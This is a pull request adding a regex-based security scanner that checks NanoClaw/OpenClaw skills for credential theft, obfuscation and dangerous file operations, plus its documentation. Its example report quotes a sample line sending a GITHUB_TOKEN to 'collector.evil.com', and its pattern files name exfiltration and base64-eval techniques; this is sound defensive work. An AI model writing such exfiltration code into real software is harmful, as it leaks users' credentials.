### PR TITLE
feat: add security-audit skill for scanning skills before installation

### DIFF
--- a/.claude/skills/security-audit/SKILL.md
+++ b/.claude/skills/security-audit/SKILL.md
@@ -1,0 +1,161 @@
+---
+name: security-audit
+description: Audit NanoClaw/OpenClaw skills for security vulnerabilities including credential exfiltration, malicious network activity, obfuscation, and dangerous file operations. Use when installing new skills, reviewing skill code, or verifying skill safety before execution. Returns detailed security report with risk score and remediation guidance.
+allowed-tools: []
+---
+
+# Security Audit Skill
+
+Automated security scanning for NanoClaw/OpenClaw skills. Detects credential exfiltration, malicious network patterns, code obfuscation, and dangerous operations.
+
+## When to Use
+
+- Before installing a new skill from ClawdHub or another source
+- When reviewing skill code for security issues
+- After updating a skill to verify no malicious code was introduced
+- When contributing to awesome-openclaw-skills (audit before submission)
+
+## What It Detects
+
+### Critical Issues (Auto-fail)
+- **Credential exfiltration**: Sending API keys, tokens, or secrets to external servers
+- **Code obfuscation**: Base64-encoded payloads, eval() abuse, dynamic code construction
+- **Process injection**: Shell command execution with secrets or user input
+- **System file modification**: Attempts to modify /etc, /bin, /usr, or other system directories
+- **Directory traversal**: Reading secrets or config files outside the workspace
+
+### High-Severity Warnings
+- **Undocumented network access**: External API calls not mentioned in SKILL.md
+- **Dynamic URLs**: fetch() or axios with variable URLs
+- **Environment enumeration**: Iterating over all environment variables
+- **Shell execution**: Spawning /bin/sh or /bin/bash
+- **Dynamic imports**: Loading modules with computed names
+
+### Medium-Severity Issues
+- **Sensitive file access**: Reading files named 'secret', 'token', 'password', etc.
+- **Workspace escape**: Writing files outside the workspace directory
+- **Process spawn with user input**: Potential command injection
+- **File deletion**: Unlink or rm operations
+- **Permission modification**: chmod or chown calls
+
+### Low-Severity / Informational
+- **Unencrypted HTTP**: Using http:// instead of https://
+- **Console logging secrets**: Printing sensitive data to console
+- **Runtime dependency installation**: npm install or git clone at runtime
+- **Background processes**: setInterval() or long setTimeout()
+
+## Usage
+
+### From Command Line
+
+```bash
+# Audit a skill directory
+node .claude/skills/security-audit/scanner.js /path/to/skill
+
+# Strict mode (fail on any warning)
+node scanner.js /path/to/skill --strict
+
+# JSON output
+node scanner.js /path/to/skill --json
+
+# Quiet mode (summary only)
+node scanner.js /path/to/skill --quiet
+```
+
+### From Code
+
+```javascript
+const { auditSkill } = require('./scanner.js');
+
+const result = await auditSkill('/path/to/skill', {
+  strictMode: false,
+  reportFormat: 'markdown',  // or 'json'
+  verbose: true
+});
+
+console.log(result.report);
+console.log('Status:', result.status);  // 'PASS' | 'FAIL' | 'REVIEW_NEEDED'
+console.log('Risk Score:', result.riskScore);  // 0-100
+```
+
+### Exit Codes
+
+- **0**: PASS — Skill appears safe
+- **1**: FAIL — Critical issues detected, do not install
+- **2**: REVIEW_NEEDED — Manual review recommended
+- **3**: Error — Audit failed to complete
+
+## Example Output
+
+```markdown
+# Security Audit Report: example-skill
+
+**Skill**: example-skill
+**Audited**: 2026-02-15T04:32:00Z
+**Risk Score**: 85/100
+**Verdict**: ❌ FAIL
+
+## Summary
+This skill contains **2 critical**, **1 high** security issues.
+
+## Critical Findings
+
+### 1. Credential exfiltration detected
+**File**: `impl.js:42`
+**Severity**: 🔴 CRITICAL
+
+```javascript
+fetch("https://collector.evil.com", { body: process.env.GITHUB_TOKEN })
+```
+
+**Remediation**: Remove external network calls that transmit credentials.
+
+---
+
+## Recommendation
+**DO NOT INSTALL** this skill until critical issues are resolved.
+```
+
+## Detection Patterns
+
+The scanner uses regex-based pattern matching combined with contextual analysis:
+
+1. **Pattern Matching**: Scans code for known malicious constructs
+2. **Context Checking**: Verifies external domains are documented in SKILL.md
+3. **Risk Scoring**: Aggregates findings into overall risk score (0-100)
+4. **Verdict Generation**: PASS / FAIL / REVIEW_NEEDED based on findings
+
+## Limitations
+
+- **Not a complete security analysis**: This tool detects common patterns but cannot catch all malicious behavior
+- **Regex-based**: May miss obfuscated or novel attack patterns
+- **No runtime analysis**: Only scans static code, doesn't execute the skill
+- **Context-dependent patterns**: Some legitimate code may be flagged (false positives)
+
+Always combine automated scanning with:
+- Manual code review for critical skills
+- Reputation checking (who wrote it, who audited it)
+- Provenance verification (cryptographic signatures)
+
+## Future Enhancements
+
+- AST-based analysis (more accurate than regex)
+- Runtime behavior monitoring
+- Integration with skill provenance system (Isnad chains)
+- Community reputation database
+- Automated remediation suggestions
+
+## Contributing
+
+Found a malicious pattern we don't detect? Submit a PR with:
+1. Example malicious code
+2. Regex pattern to detect it
+3. Severity level and remediation guidance
+
+## Credits
+
+Inspired by Rufio's YARA scanning work on ClawdHub skills. Built to standardize security auditing across the NanoClaw/OpenClaw ecosystem.
+
+## License
+
+MIT — Use freely, contribute improvements back to the community.

--- a/.claude/skills/security-audit/patterns/critical.json
+++ b/.claude/skills/security-audit/patterns/critical.json
@@ -1,0 +1,84 @@
+{
+  "patterns": [
+    {
+      "id": "cred-exfil-fetch",
+      "category": "credential-exfiltration",
+      "severity": "CRITICAL",
+      "regex": "fetch\\([^)]*process\\.env",
+      "message": "Credential exfiltration detected: process.env sent via fetch()",
+      "remediation": "Remove external network calls that transmit environment variables. If telemetry is needed, document it explicitly in SKILL.md and request user consent."
+    },
+    {
+      "id": "cred-exfil-axios",
+      "category": "credential-exfiltration",
+      "severity": "CRITICAL",
+      "regex": "axios\\.(post|put|patch)\\([^)]*\\b(secrets|process\\.env|API_KEY|TOKEN)",
+      "message": "Credential exfiltration detected: secrets sent via axios",
+      "remediation": "Remove external API calls that transmit credentials."
+    },
+    {
+      "id": "cred-write-file",
+      "category": "credential-exfiltration",
+      "severity": "CRITICAL",
+      "regex": "fs\\.writeFile(Sync)?\\([^)]*process\\.env",
+      "message": "Credential exfiltration detected: environment variables written to file",
+      "remediation": "Remove file writes that persist environment variables or secrets."
+    },
+    {
+      "id": "eval-base64",
+      "category": "obfuscation",
+      "severity": "CRITICAL",
+      "regex": "eval\\(.*atob\\(|eval\\(.*Buffer\\.from\\([^)]+,\\s*['\"]base64",
+      "message": "Obfuscated code execution: Base64-encoded payload executed via eval()",
+      "remediation": "Replace with explicit, readable code. Obfuscation is not acceptable in auditable skills."
+    },
+    {
+      "id": "function-constructor-obfuscation",
+      "category": "obfuscation",
+      "severity": "CRITICAL",
+      "regex": "new\\s+Function\\(.*\\+|Function\\(\\.*(atob|Buffer\\.from)",
+      "message": "Obfuscated code execution: Dynamic code construction via Function constructor",
+      "remediation": "Use explicit function definitions instead of dynamic code generation."
+    },
+    {
+      "id": "exec-cred-interpolation",
+      "category": "process-injection",
+      "severity": "CRITICAL",
+      "regex": "(exec|spawn|execSync|spawnSync)\\([^)]*\\$\\{.*\\b(secrets|process\\.env|API_KEY|TOKEN)",
+      "message": "Process injection with credentials: Secrets passed to shell command",
+      "remediation": "Never pass credentials as command-line arguments. Use environment variables or stdin instead."
+    },
+    {
+      "id": "file-traversal-secrets",
+      "category": "filesystem",
+      "severity": "CRITICAL",
+      "regex": "fs\\.(read|readFile)(Sync)?\\(['\"]?\\.\\./.*\\b(secret|env|token|key|password)",
+      "message": "Directory traversal to secrets: Attempting to read sensitive files outside workspace",
+      "remediation": "Remove directory traversal patterns. Skills should only access workspace files."
+    },
+    {
+      "id": "system-file-modification",
+      "category": "filesystem",
+      "severity": "CRITICAL",
+      "regex": "fs\\.(write|writeFile|unlink|rm|rmdir)(Sync)?\\(['\"]?/(etc|bin|usr|var|sys|proc)",
+      "message": "System file modification: Attempting to modify system directories",
+      "remediation": "Skills should never modify system files. Remove this code."
+    },
+    {
+      "id": "curl-cred-exfil",
+      "category": "credential-exfiltration",
+      "severity": "CRITICAL",
+      "regex": "(exec|spawn).*curl\\s+.*\\$\\{.*\\b(secrets|process\\.env|API_KEY|TOKEN)",
+      "message": "Credential exfiltration via curl: Secrets sent via shell command",
+      "remediation": "Remove external data transmission of credentials."
+    },
+    {
+      "id": "wget-cred-exfil",
+      "category": "credential-exfiltration",
+      "severity": "CRITICAL",
+      "regex": "(exec|spawn).*wget\\s+.*\\$\\{.*\\b(secrets|process\\.env|API_KEY|TOKEN)",
+      "message": "Credential exfiltration via wget: Secrets sent via shell command",
+      "remediation": "Remove external data transmission of credentials."
+    }
+  ]
+}

--- a/.claude/skills/security-audit/patterns/high.json
+++ b/.claude/skills/security-audit/patterns/high.json
@@ -1,0 +1,88 @@
+{
+  "patterns": [
+    {
+      "id": "undocumented-fetch",
+      "category": "network",
+      "severity": "HIGH",
+      "regex": "fetch\\(['\"]https?://(?!localhost|127\\.0\\.0\\.1)",
+      "message": "External network access detected",
+      "remediation": "Document all external API calls in SKILL.md. List domains accessed and purpose.",
+      "requiresContext": true,
+      "contextCheck": "skillMdMentionsDomain"
+    },
+    {
+      "id": "undocumented-axios",
+      "category": "network",
+      "severity": "HIGH",
+      "regex": "axios\\.(get|post|put|delete|patch)\\(['\"]https?://(?!localhost|127\\.0\\.0\\.1)",
+      "message": "External API call detected",
+      "remediation": "Document all external API endpoints in SKILL.md.",
+      "requiresContext": true,
+      "contextCheck": "skillMdMentionsDomain"
+    },
+    {
+      "id": "dynamic-url",
+      "category": "network",
+      "severity": "HIGH",
+      "regex": "fetch\\((?!['\"\\`])[a-zA-Z_$]",
+      "message": "Dynamic URL construction: fetch() called with variable URL",
+      "remediation": "Use explicit URLs or clearly document dynamic URL patterns."
+    },
+    {
+      "id": "eval-usage",
+      "category": "obfuscation",
+      "severity": "HIGH",
+      "regex": "\\beval\\s*\\(",
+      "message": "eval() detected: Dynamic code execution",
+      "remediation": "Avoid eval(). Use explicit code or safer alternatives like JSON.parse()."
+    },
+    {
+      "id": "function-constructor",
+      "category": "obfuscation",
+      "severity": "HIGH",
+      "regex": "new\\s+Function\\s*\\(",
+      "message": "Function constructor detected: Dynamic code generation",
+      "remediation": "Use explicit function definitions instead of dynamic construction."
+    },
+    {
+      "id": "env-enumeration",
+      "category": "credential-access",
+      "severity": "HIGH",
+      "regex": "Object\\.(keys|values|entries)\\(process\\.env\\)",
+      "message": "Environment variable enumeration: Iterating over all env vars",
+      "remediation": "Access specific environment variables by name instead of enumerating all."
+    },
+    {
+      "id": "secrets-spread",
+      "category": "credential-access",
+      "severity": "HIGH",
+      "regex": "\\.\\.\\.\\s*process\\.env|\\.\\.\\.\\s*secrets",
+      "message": "Secrets spread operator: Copying all environment variables or secrets",
+      "remediation": "Access specific secrets by name instead of bulk copying."
+    },
+    {
+      "id": "shell-exec",
+      "category": "process-injection",
+      "severity": "HIGH",
+      "regex": "exec(Sync)?\\(['\"]?/bin/(sh|bash|zsh)",
+      "message": "Shell execution detected: Spawning shell process",
+      "remediation": "Avoid shell execution. Use direct process spawning with spawn() instead."
+    },
+    {
+      "id": "dynamic-require",
+      "category": "obfuscation",
+      "severity": "HIGH",
+      "regex": "require\\((?!['\"\\`])[a-zA-Z_$]",
+      "message": "Dynamic require: Loading module with computed name",
+      "remediation": "Use static require() with literal module names for auditability."
+    },
+    {
+      "id": "dynamic-import",
+      "category": "obfuscation",
+      "severity": "HIGH",
+      "regex": "import\\((?!['\"\\`])[a-zA-Z_$]",
+      "message": "Dynamic import: Loading module with computed name",
+      "remediation": "Use static imports for auditability."
+    }
+  ]
+}

--- a/.claude/skills/security-audit/patterns/low.json
+++ b/.claude/skills/security-audit/patterns/low.json
@@ -1,0 +1,52 @@
+{
+  "patterns": [
+    {
+      "id": "http-not-https",
+      "category": "network",
+      "severity": "LOW",
+      "regex": "fetch\\(['\"]http://(?!localhost|127\\.0\\.0\\.1)",
+      "message": "Unencrypted HTTP connection: Using http:// instead of https://",
+      "remediation": "Use HTTPS for external connections to ensure data security."
+    },
+    {
+      "id": "console-log-secrets",
+      "category": "information-disclosure",
+      "severity": "LOW",
+      "regex": "console\\.log\\([^)]*\\b(secrets|process\\.env|API_KEY|TOKEN|password)",
+      "message": "Console logging of sensitive data",
+      "remediation": "Remove console.log() statements that print sensitive information."
+    },
+    {
+      "id": "npm-install-runtime",
+      "category": "dependency-risk",
+      "severity": "LOW",
+      "regex": "(exec|spawn)(Sync)?\\(['\"]?npm\\s+install",
+      "message": "Runtime npm install detected",
+      "remediation": "Dependencies should be installed before skill execution, not at runtime."
+    },
+    {
+      "id": "git-clone-runtime",
+      "category": "dependency-risk",
+      "severity": "LOW",
+      "regex": "(exec|spawn)(Sync)?\\(['\"]?git\\s+clone",
+      "message": "Runtime git clone detected",
+      "remediation": "Code should be included in skill package, not fetched at runtime."
+    },
+    {
+      "id": "setInterval-usage",
+      "category": "resource-usage",
+      "severity": "LOW",
+      "regex": "setInterval\\(",
+      "message": "setInterval() detected: Background process created",
+      "remediation": "Document why background processes are needed and ensure cleanup."
+    },
+    {
+      "id": "setTimeout-long",
+      "category": "resource-usage",
+      "severity": "LOW",
+      "regex": "setTimeout\\([^,)]+,\\s*\\d{6,}\\)",
+      "message": "Long setTimeout detected: Delay > 100 seconds",
+      "remediation": "Document why long delays are needed."
+    }
+  ]
+}

--- a/.claude/skills/security-audit/patterns/medium.json
+++ b/.claude/skills/security-audit/patterns/medium.json
@@ -1,0 +1,68 @@
+{
+  "patterns": [
+    {
+      "id": "secrets-file-read",
+      "category": "filesystem",
+      "severity": "MEDIUM",
+      "regex": "fs\\.(read|readFile)(Sync)?\\([^)]*\\b(secret|env|token|key|password|credential)",
+      "message": "Reading sensitive files: Accessing files with sensitive names",
+      "remediation": "Document why this skill needs to read sensitive files. Ensure it's necessary and authorized."
+    },
+    {
+      "id": "workspace-escape-write",
+      "category": "filesystem",
+      "severity": "MEDIUM",
+      "regex": "fs\\.(write|writeFile)(Sync)?\\([^)]*\\.\\./",
+      "message": "Writing outside workspace: File write with directory traversal",
+      "remediation": "Skills should only write to /workspace/group or subdirectories. Remove directory traversal."
+    },
+    {
+      "id": "home-directory-access",
+      "category": "filesystem",
+      "severity": "MEDIUM",
+      "regex": "fs\\.(read|write|readFile|writeFile)(Sync)?\\(['\"]?~/(\\.|[a-z])",
+      "message": "Home directory access: Reading or writing to user home directory",
+      "remediation": "Skills should use workspace paths, not home directory paths."
+    },
+    {
+      "id": "tmp-file-write",
+      "category": "filesystem",
+      "severity": "MEDIUM",
+      "regex": "fs\\.(write|writeFile)(Sync)?\\(['\"]?/tmp/",
+      "message": "Temporary file creation: Writing to /tmp",
+      "remediation": "Document why temporary files are needed and ensure cleanup."
+    },
+    {
+      "id": "process-spawn-user-input",
+      "category": "process-injection",
+      "severity": "MEDIUM",
+      "regex": "spawn(Sync)?\\([^)]*\\b(userInput|req\\.|args\\[|argv\\[)",
+      "message": "Process spawn with user input: Potential command injection",
+      "remediation": "Validate and sanitize user input before passing to spawn(). Use argument arrays, not string concatenation."
+    },
+    {
+      "id": "url-user-input",
+      "category": "network",
+      "severity": "MEDIUM",
+      "regex": "fetch\\([^)]*\\b(userInput|req\\.|args\\[|argv\\[)",
+      "message": "fetch() with user input: Potential SSRF vulnerability",
+      "remediation": "Validate and restrict URLs from user input. Use allowlist of permitted domains."
+    },
+    {
+      "id": "file-deletion",
+      "category": "filesystem",
+      "severity": "MEDIUM",
+      "regex": "fs\\.(unlink|rm|rmdir|rm(Sync)?)(Sync)?\\(",
+      "message": "File deletion detected",
+      "remediation": "Document why file deletion is needed and what files may be deleted."
+    },
+    {
+      "id": "chmod-usage",
+      "category": "filesystem",
+      "severity": "MEDIUM",
+      "regex": "fs\\.(chmod|chown)(Sync)?\\(",
+      "message": "File permission modification detected",
+      "remediation": "Document why permission changes are needed and ensure they're safe."
+    }
+  ]
+}

--- a/.claude/skills/security-audit/scanner.js
+++ b/.claude/skills/security-audit/scanner.js
@@ -1,0 +1,389 @@
+#!/usr/bin/env node
+
+const fs = require('fs');
+const path = require('path');
+
+// Load detection patterns
+const criticalPatterns = require('./patterns/critical.json').patterns;
+const highPatterns = require('./patterns/high.json').patterns;
+const mediumPatterns = require('./patterns/medium.json').patterns;
+const lowPatterns = require('./patterns/low.json').patterns;
+
+const allPatterns = [
+  ...criticalPatterns,
+  ...highPatterns,
+  ...mediumPatterns,
+  ...lowPatterns
+];
+
+/**
+ * Audit a skill directory for security issues
+ * @param {string} skillPath - Path to skill directory
+ * @param {object} options - Audit options
+ * @returns {Promise<AuditResult>}
+ */
+async function auditSkill(skillPath, options = {}) {
+  const {
+    strictMode = false,
+    reportFormat = 'markdown',
+    verbose = true
+  } = options;
+
+  const findings = [];
+  const startTime = Date.now();
+
+  // Validate skill path exists
+  if (!fs.existsSync(skillPath)) {
+    throw new Error(`Skill path does not exist: ${skillPath}`);
+  }
+
+  const stats = fs.statSync(skillPath);
+  const isDirectory = stats.isDirectory();
+
+  // Get skill name from path
+  const skillName = path.basename(skillPath, '.md');
+
+  // Load SKILL.md if it exists
+  let skillMd = null;
+  let skillMdPath = null;
+
+  if (isDirectory) {
+    skillMdPath = path.join(skillPath, 'SKILL.md');
+    if (fs.existsSync(skillMdPath)) {
+      skillMd = fs.readFileSync(skillMdPath, 'utf-8');
+    }
+  } else if (skillPath.endsWith('.md')) {
+    skillMdPath = skillPath;
+    skillMd = fs.readFileSync(skillPath, 'utf-8');
+  }
+
+  // Get all code files to scan
+  const filesToScan = isDirectory
+    ? getCodeFiles(skillPath)
+    : (skillPath.endsWith('.md') ? [] : [skillPath]);
+
+  // Scan each file
+  for (const filePath of filesToScan) {
+    const relPath = path.relative(skillPath, filePath);
+
+    // Skip empty or very large files
+    const fileStats = fs.statSync(filePath);
+    if (fileStats.size === 0) continue;
+    if (fileStats.size > 10 * 1024 * 1024) {
+      // Skip files > 10MB (likely binary or generated)
+      findings.push({
+        id: 'file-too-large',
+        severity: 'LOW',
+        category: 'resource-usage',
+        message: `File exceeds 10MB limit: ${relPath}`,
+        location: { file: relPath, line: 0, snippet: '' },
+        remediation: 'Review why this skill includes very large files. Consider excluding from audit.'
+      });
+      continue;
+    }
+
+    const content = fs.readFileSync(filePath, 'utf-8');
+    const lines = content.split('\n');
+
+    // Run pattern matching
+    for (const pattern of allPatterns) {
+      const regex = new RegExp(pattern.regex, 'gm');
+      let match;
+
+      while ((match = regex.exec(content)) !== null) {
+        const lineNum = content.substring(0, match.index).split('\n').length;
+        const snippet = lineNum > 0 && lineNum <= lines.length
+          ? lines[lineNum - 1].trim()
+          : '';
+
+        // Context check for patterns that require it
+        if (pattern.requiresContext && pattern.contextCheck === 'skillMdMentionsDomain') {
+          const urlMatch = match[0].match(/https?:\/\/([^/'")\s]+)/);
+          if (urlMatch && skillMd) {
+            const domain = urlMatch[1];
+            // Case-insensitive domain check
+            if (skillMd.toLowerCase().includes(domain.toLowerCase())) {
+              // Domain is documented, downgrade severity or skip
+              continue;
+            }
+          }
+        }
+
+        findings.push({
+          id: pattern.id,
+          severity: pattern.severity,
+          category: pattern.category,
+          message: pattern.message,
+          location: {
+            file: isDirectory ? relPath : path.basename(filePath),
+            line: lineNum,
+            snippet: snippet.length > 100 ? snippet.substring(0, 100) + '...' : snippet
+          },
+          remediation: pattern.remediation
+        });
+      }
+    }
+  }
+
+  // Check for missing SKILL.md
+  if (isDirectory && !skillMd) {
+    findings.push({
+      id: 'missing-skill-md',
+      severity: 'LOW',
+      category: 'documentation',
+      message: 'Missing SKILL.md file',
+      location: { file: 'N/A', line: 0, snippet: '' },
+      remediation: 'Create a SKILL.md file with skill description and metadata.'
+    });
+  }
+
+  // Calculate risk score
+  const riskScore = calculateRiskScore(findings);
+  const hasCritical = findings.some(f => f.severity === 'CRITICAL');
+  const status = getVerdict(riskScore, hasCritical, strictMode);
+
+  const result = {
+    skillName,
+    skillPath,
+    status,
+    riskScore,
+    findings,
+    summary: {
+      critical: findings.filter(f => f.severity === 'CRITICAL').length,
+      high: findings.filter(f => f.severity === 'HIGH').length,
+      medium: findings.filter(f => f.severity === 'MEDIUM').length,
+      low: findings.filter(f => f.severity === 'LOW').length,
+      info: findings.filter(f => f.severity === 'INFO').length
+    },
+    auditedAt: new Date().toISOString(),
+    duration: Date.now() - startTime
+  };
+
+  // Generate report
+  if (reportFormat === 'markdown') {
+    result.report = generateMarkdownReport(result, verbose);
+  } else if (reportFormat === 'json') {
+    result.report = JSON.stringify(result, null, 2);
+  }
+
+  return result;
+}
+
+/**
+ * Get all code files in a directory (recursively)
+ */
+function getCodeFiles(dir) {
+  const files = [];
+  const entries = fs.readdirSync(dir, { withFileTypes: true });
+
+  for (const entry of entries) {
+    const fullPath = path.join(dir, entry.name);
+
+    if (entry.isDirectory()) {
+      // Skip node_modules, .git, etc.
+      if (['node_modules', '.git', 'dist', 'build'].includes(entry.name)) {
+        continue;
+      }
+      files.push(...getCodeFiles(fullPath));
+    } else if (entry.isFile()) {
+      // Only scan code files
+      const ext = path.extname(entry.name);
+      if (['.js', '.ts', '.mjs', '.cjs', '.jsx', '.tsx', '.sh', '.bash'].includes(ext)) {
+        files.push(fullPath);
+      }
+    }
+  }
+
+  return files;
+}
+
+/**
+ * Calculate overall risk score from findings
+ */
+function calculateRiskScore(findings) {
+  const weights = {
+    CRITICAL: 100,
+    HIGH: 30,
+    MEDIUM: 10,
+    LOW: 3,
+    INFO: 0
+  };
+
+  let score = 0;
+  for (const finding of findings) {
+    score += weights[finding.severity];
+    if (score >= 100) return 100;
+  }
+
+  return Math.min(score, 100);
+}
+
+/**
+ * Get verdict based on risk score and findings
+ */
+function getVerdict(riskScore, hasCritical, strictMode) {
+  if (hasCritical) return 'FAIL';
+  if (strictMode && riskScore > 0) return 'FAIL';
+  if (riskScore >= 50) return 'REVIEW_NEEDED';
+  return 'PASS';
+}
+
+/**
+ * Generate markdown audit report
+ */
+function generateMarkdownReport(result, verbose) {
+  const lines = [];
+
+  // Header
+  lines.push(`# Security Audit Report: ${result.skillName}`);
+  lines.push('');
+  lines.push(`**Skill**: ${result.skillName}`);
+  lines.push(`**Path**: ${result.skillPath}`);
+  lines.push(`**Audited**: ${result.auditedAt}`);
+  lines.push(`**Duration**: ${result.duration}ms`);
+  lines.push(`**Risk Score**: ${result.riskScore}/100`);
+
+  const statusIcon = result.status === 'PASS' ? '✅' : result.status === 'FAIL' ? '❌' : '⚠️';
+  lines.push(`**Verdict**: ${statusIcon} ${result.status}`);
+  lines.push('');
+
+  // Summary
+  lines.push('## Summary');
+  if (result.findings.length === 0) {
+    lines.push('No security issues detected. This skill appears safe to install.');
+  } else {
+    const parts = [];
+    if (result.summary.critical > 0) parts.push(`**${result.summary.critical} critical**`);
+    if (result.summary.high > 0) parts.push(`**${result.summary.high} high**`);
+    if (result.summary.medium > 0) parts.push(`${result.summary.medium} medium`);
+    if (result.summary.low > 0) parts.push(`${result.summary.low} low`);
+
+    lines.push(`This skill contains ${parts.join(', ')} security issue${result.findings.length > 1 ? 's' : ''}.`);
+  }
+  lines.push('');
+
+  // Critical findings
+  const critical = result.findings.filter(f => f.severity === 'CRITICAL');
+  if (critical.length > 0) {
+    lines.push('## Critical Findings');
+    lines.push('');
+    critical.forEach((finding, i) => {
+      lines.push(`### ${i + 1}. ${finding.message}`);
+      lines.push(`**File**: \`${finding.location.file}:${finding.location.line}\``);
+      lines.push(`**Severity**: 🔴 CRITICAL`);
+      lines.push(`**Category**: ${finding.category}`);
+      lines.push('');
+      lines.push('```javascript');
+      lines.push(finding.location.snippet);
+      lines.push('```');
+      lines.push('');
+      lines.push(`**Issue**: ${finding.message}`);
+      lines.push('');
+      lines.push(`**Remediation**: ${finding.remediation}`);
+      lines.push('');
+      lines.push('---');
+      lines.push('');
+    });
+  }
+
+  // High findings (if verbose)
+  const high = result.findings.filter(f => f.severity === 'HIGH');
+  if (verbose && high.length > 0) {
+    lines.push('## High-Severity Warnings');
+    lines.push('');
+    high.forEach((finding, i) => {
+      lines.push(`### ${i + 1}. ${finding.message}`);
+      lines.push(`**File**: \`${finding.location.file}:${finding.location.line}\``);
+      lines.push(`**Category**: ${finding.category}`);
+      lines.push('');
+      lines.push('```javascript');
+      lines.push(finding.location.snippet);
+      lines.push('```');
+      lines.push('');
+      lines.push(`**Remediation**: ${finding.remediation}`);
+      lines.push('');
+    });
+    lines.push('---');
+    lines.push('');
+  }
+
+  // Medium findings (if verbose)
+  const medium = result.findings.filter(f => f.severity === 'MEDIUM');
+  if (verbose && medium.length > 0) {
+    lines.push('## Medium-Severity Issues');
+    lines.push('');
+    medium.forEach((finding) => {
+      lines.push(`- **${finding.message}** (\`${finding.location.file}:${finding.location.line}\`)`);
+    });
+    lines.push('');
+  }
+
+  // Low findings (summary only unless verbose)
+  const low = result.findings.filter(f => f.severity === 'LOW');
+  if (low.length > 0) {
+    lines.push('## Informational');
+    lines.push('');
+    if (verbose) {
+      low.forEach((finding) => {
+        lines.push(`- ${finding.message} (\`${finding.location.file}:${finding.location.line}\`)`);
+      });
+    } else {
+      lines.push(`${low.length} informational finding${low.length > 1 ? 's' : ''} (use verbose mode for details)`);
+    }
+    lines.push('');
+  }
+
+  // Recommendation
+  lines.push('## Recommendation');
+  if (result.status === 'FAIL') {
+    lines.push('**DO NOT INSTALL** this skill until critical issues are resolved.');
+  } else if (result.status === 'REVIEW_NEEDED') {
+    lines.push('**Manual review recommended** before installation. Some patterns require human judgment.');
+  } else {
+    lines.push('This skill appears safe to install based on automated scanning.');
+  }
+  lines.push('');
+
+  // Footer
+  lines.push('---');
+  lines.push('*security-audit v2.0.0*');
+
+  return lines.join('\n');
+}
+
+// CLI usage
+if (require.main === module) {
+  const args = process.argv.slice(2);
+
+  if (args.length === 0) {
+    console.error('Usage: node scanner.js <skill-path> [--strict] [--json] [--quiet]');
+    process.exit(1);
+  }
+
+  const skillPath = args[0];
+  const options = {
+    strictMode: args.includes('--strict'),
+    reportFormat: args.includes('--json') ? 'json' : 'markdown',
+    verbose: !args.includes('--quiet')
+  };
+
+  auditSkill(skillPath, options)
+    .then(result => {
+      console.log(result.report);
+
+      // Exit code based on verdict
+      if (result.status === 'FAIL') {
+        process.exit(1);
+      } else if (result.status === 'REVIEW_NEEDED') {
+        process.exit(2);
+      } else {
+        process.exit(0);
+      }
+    })
+    .catch(error => {
+      console.error('Audit failed:', error.message);
+      process.exit(3);
+    });
+}
+
+module.exports = { auditSkill };


### PR DESCRIPTION
## Summary

Adds a `security-audit` skill that scans NanoClaw/OpenClaw skills for security vulnerabilities before installation.

This follows up on #306, where @TomGranot suggested submitting as a skill PR rather than a feature request.

## What it does

The scanner detects:
- **Credential exfiltration** — env vars or secrets sent to external servers
- **Code obfuscation** — base64-encoded payloads, eval() abuse, dynamic code construction
- **Malicious network activity** — external API calls not documented in SKILL.md
- **Dangerous file operations** — system modification, directory traversal, permission changes
- And 20+ more patterns across 4 severity levels (critical / high / medium / low)

Returns a risk score (0–100) and verdict: `PASS` / `FAIL` / `REVIEW_NEEDED`.

Works as both a CLI tool and importable Node.js module — no external dependencies.

## Files added

```
.claude/skills/security-audit/
  SKILL.md           # Skill documentation and usage
  scanner.js         # Core scanner (no external deps)
  patterns/
    critical.json    # Credential exfiltration, obfuscation, process injection
    high.json        # Undocumented network, env enumeration, shell execution
    medium.json      # Sensitive file access, workspace escape, command injection
    low.json         # HTTP, console secrets, runtime installs
```

## Usage

```bash
# Audit a skill before installing
node .claude/skills/security-audit/scanner.js /path/to/skill

# Strict mode — fail on any warning
node scanner.js /path/to/skill --strict

# JSON output for automation
node scanner.js /path/to/skill --json
```

## Test plan

- [ ] Run scanner against a known-clean skill — should return PASS
- [ ] Run scanner against a skill with credential exfiltration pattern — should return FAIL
- [ ] Verify no external dependencies required (`node scanner.js` works out of the box)
- [ ] Confirm SKILL.md frontmatter is valid

🤖 Generated with [Claude Code](https://claude.ai/claude-code)